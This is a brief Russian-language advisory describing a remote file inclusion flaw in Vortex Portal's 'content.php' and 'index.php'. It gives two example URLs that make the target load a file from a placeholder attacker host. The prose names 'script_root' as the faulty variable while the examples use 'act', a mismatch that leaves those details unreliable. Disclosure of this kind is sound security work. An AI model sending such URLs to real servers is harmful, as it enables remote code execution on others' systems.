Программа: Vortex Portal

Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на уязвимой системе с привилегиями
web севера. Уязвимость существует в
сценариях ‘content.php’ и ‘index.php’ из-за
некорректной обработки входных данных в
переменной ‘script_root’. Удаленный пользователь
может с помощью специально сформированного
URL выполнить произвольные команды на
целевой системе с привилегиями web сервера.

Примеры:

http://[target]/index.php?act=http://[attacker]/file
http://[target]/content.php?act=http://[attacker]/file

Оставить мнение